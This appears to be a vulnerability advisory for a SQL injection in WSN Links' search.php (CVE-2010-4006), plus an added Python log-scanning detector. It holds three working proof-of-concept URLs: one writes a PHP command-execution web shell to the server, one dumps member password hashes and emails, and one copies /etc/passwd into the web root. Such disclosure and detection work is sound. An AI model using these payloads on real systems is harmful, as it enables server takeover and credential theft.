WSN Links SQL injection vulnerability

2010-11-26T00:00:00
ID MYHACK58:62201028423
Type myhack58
Reporter Anonymous
Modified 2010-11-26T00:00:00

Description

WSN Links is an advanced PHP/MySQL search script. In WSN Links versions < 6.0.1, < 5.1.51 and < 5.0.81, the search.php file contains a SQL injection vulnerability that could lead to disclosure of sensitive information.

[+]info:
~~~~~~~~~
'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)
Mark Stanislav - mark.stanislav@gmail.com

[+]poc:
~~~~~~~~~
1) A 'UNION SELECT' which results in a PHP shell-execution script
http://example.com/search.php?namecondition=IS%20NULL))%20UNION%20((SELECT%20"<?php%20system($_REQUEST[cmd]);%20?>"%20INTO%20OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categories

2) A 'UNION SELECT' which results in a member's name, password hash, and e-mail to be extracted to a file
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILE&namesearch=/var/www/pass.txt&action=filter&filled=1&whichtype=categories

3) A 'UNION SELECT' which results in the /etc/passwd file being copied to a web directory file
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILE&namesearch=/var/www/passwd.txt&action=filter&filled=1&whichtype=categories
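
A detection sketch for the three requests above, added here as an example and not part of the original advisory: it scans web server access logs for search.php requests whose parameters carry the SQL constructs the PoCs rely on. The combined log format, the sample log lines (including the benign namecondition value) and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# SQL constructs taken from the advisory's PoC requests.
INDICATORS = {
    "union_select": re.compile(r"union\W*select", re.I),
    "into_outfile": re.compile(r"into\s+outfile", re.I),
    "load_file": re.compile(r"load_file\s*\(", re.I),
}
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines: one ordinary search, one request shaped like PoC 3,
# one request to a different script.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Nov/2010:10:01:02 +0000] "GET /search.php?namecondition=like'
    '&namesearch=linux&action=filter&filled=1&whichtype=categories HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Nov/2010:10:04:40 +0000] "GET /search.php?namecondition='
    'IS%20NOT%20NULL))%20UNION%20((SELECT%20load_file(0x2f6574632f706173737764)'
    '%20INTO%20OUTFILE&namesearch=/var/www/passwd.txt&action=filter&filled=1'
    '&whichtype=categories HTTP/1.1" 200 812',
    '203.0.113.7 - - [26/Nov/2010:10:05:11 +0000] "GET /index.php?page=2 HTTP/1.1" 200 100',
]


def inspect_line(line):
    """Return a finding for a suspicious search.php request, else None."""
    m = REQUEST.search(line)
    target = urlsplit(m.group(1)) if m else None
    if not target or not target.path.lower().endswith("/search.php"):
        return None
    # parse_qs percent-decodes, so %20UNION%20 is matched as " UNION ".
    params = parse_qs(target.query, keep_blank_values=True)
    hits = {}
    for name, values in params.items():
        labels = sorted(k for k, rx in INDICATORS.items() if any(rx.search(v) for v in values))
        if labels:
            hits[name] = labels
    if not hits:
        return None
    # In the PoCs the OUTFILE path travels in namesearch, not namecondition.
    return {"client": line.split(" ", 1)[0], "params": hits,
            "outfile_path": params.get("namesearch", [""])[0]}


def scan(lines):
    """Return the findings for every flagged line, in log order."""
    return [f for f in map(inspect_line, lines) if f]
```

A non-empty outfile_path in a finding names the file to look for on the web server when triaging the hit.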

[+]Reference:
~~~~~~~~~
http://www.wsnlinks.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4006
http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/